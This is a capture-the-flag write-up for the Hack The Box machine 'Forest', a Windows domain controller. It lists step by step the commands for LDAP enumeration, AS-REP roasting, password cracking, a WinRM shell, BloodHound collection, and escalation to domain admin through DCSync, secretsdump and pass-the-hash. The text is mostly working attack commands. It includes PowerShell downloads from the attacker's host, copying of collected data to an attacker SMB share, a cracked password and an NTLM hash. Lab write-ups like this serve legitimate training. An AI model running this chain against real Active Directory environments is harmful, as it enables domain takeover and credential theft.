Again, we start with nmap -sC -sV -oA ./forest 10.10.10.161
Here we have a Windows Server 2016 running with DNS, SMB, LDAP, and a few other nicities but amazingly no web ports. Combine LDAP with the name of the box "Forest" and we can be fairly certain that this is a Domain Controller and that we are attacking LDAP. So, first off, let's check the ldap service to see if anonymous binding is enabled. We do this with
ldapsearch -h 10.10.10.161 -p 389 -x -b "dc=htb,dc=local"
In ldapsearch the -h is the host, -p is the port, -x is for connecting anonymously, and -b is the base distiguished name which we can pull from the SMB response in the nmap output. The output is too large to add here, but is in the above CTB file. In line 7,826 (not joking) of the ldapsearch output, we find svc-alfreso. Alfresco is a Content and Process service. One of their support douments here, tells us that Kerberos pre-authentication must be off in order for Alfresco to work with AD. Excellent! That means we can request a Kerberos ticket as svc-alfresco. Somebody didn't think that one through. If we do a Google search for Kerberoast with Alfresco, our top result is Roasting AS-REPs. Using GetNPUsers.py from impacket, we can grab the hash.
Let's use hackcat to break it.
So, the password is s3rvice. That's just laziness right there. Windows box so SSH is out. Let's expand our port scan and see if any other Remote Access Tools (RATs) are available.
Interestingly enough, we do find another port open. We find 47001 open with WinRM running on it.
To exploit WinRM, let's use Evil-WinRM, which can be found on the HackPlayers github here.
So, with ruby evil-winrm.rb -i 10.10.10.161 -u svc-alfresco -p s3rvice, we get a low level shell. Let's now map out the domain and see what privileges everyone has. First, let's get Bloodhound onto the target. You can get Bloodhound here (or just use pip install bloodhound or apt-get install bloodhound I went the apt-get direction) and I highly recommend it. For AD mapping it's a powerful tool. To get it to the target, set up a SimpleHTTPServer and use:
python3 http.server 8081
(new-object System.Net.WebClient).DownloadFile('http://YOURIP:PORT/SharpHound.exe', 'C:\Users\svc-alfresco\Desktop\SharpHound.exe')
It will create 2 new files. You need to get those files back to your machine. Easily done with a little certutil magic.
Next, we can use the smbserver.py from impacket to move the files over. Create an smb folder, and then run:
sudo python3 /impacket/examples/smbserver.py share smb
Copy-Item -Path ./20200401143304_BloodHound.zip -Destination \\10.10.XX.XX\share\20200401143304_BloodHound.zip;
Copy-Item -Path ./MzZhZTZmYjktOTM4NS00NDQ3LTk3OGItMmEyYTVjZjNiYTYw.bin -Destination \\10.10.XX.XX\share\MzZhZTZmYjktOTM4NS00NDQ3LTk3OGItMmEyYTVjZjNiYTYw.bin;
The files are now on your machine. Time to fire up BloodHound. To start, use:
sudo neo4j console
If this is your first time using BloodHound, or you are using it for the first time on a fresh install, you first need to go to http://localhost:7474 and change the neo4j:neo4j default credential. When you run bloodhound, you'll need to use those new creds. Set your starting "node" as firstname.lastname@example.org. When BloodHound shows you the user, right click on it and select owned. Click on the 3 stacked horizontal lines (the hamburger :D) and select the Queries tab. From there, select "Shortest Path from Owned Principles"
The graph shows that svc-alfresco has permissions to:
1) Create an account (Account Operators)
2) Add users to Exchange Windows Permissions (Because Account Operators has Generic All permissions on Exchange Windows Permissions)
3) Exchange Windows Permissions has WriteDACL to the Domain.
I'm going to rapid fire the next few commands. We are going to create a new user, add that user to the Exchange Windows Permissions group, and then use the new user and PowerSploit
to dump all of the password hashes. Here goes:
net user uvbeenhacked password /add /domain
net group "Exchange Windows Permissions" /add uvbeenhacked
Switch to Attacking Machine and the Directory PowerView is in (PowerSploit/Recon/PowerView.ps1)
python -m SimpleHTTPServer 8081
Switch BACK to the Victim
(new-object System.Net.WebClient).DownloadFile('http://10.10.XX.XX:8081/PowerView.ps1', 'C:\Users\svc-alfresco\Desktop\PowerView.ps1')
$pass = convertto-securestring 'password' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('htb\uvbeenhacked', $pass)
Add-DomainObjectAcl -Credential $cred -TargetIdentity "DC=htb,DC=local" -PrincipalIdentity uvbeenhacked -Rights DCSync
Switch back to the Attacking Machine
sudo python3 /impacket/examples/secretsdump.py htb.local\uvbeenhacked:email@example.com
From here, we can pass the hash to get an Administrator shell using:
/impacket/examples/psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6 firstname.lastname@example.org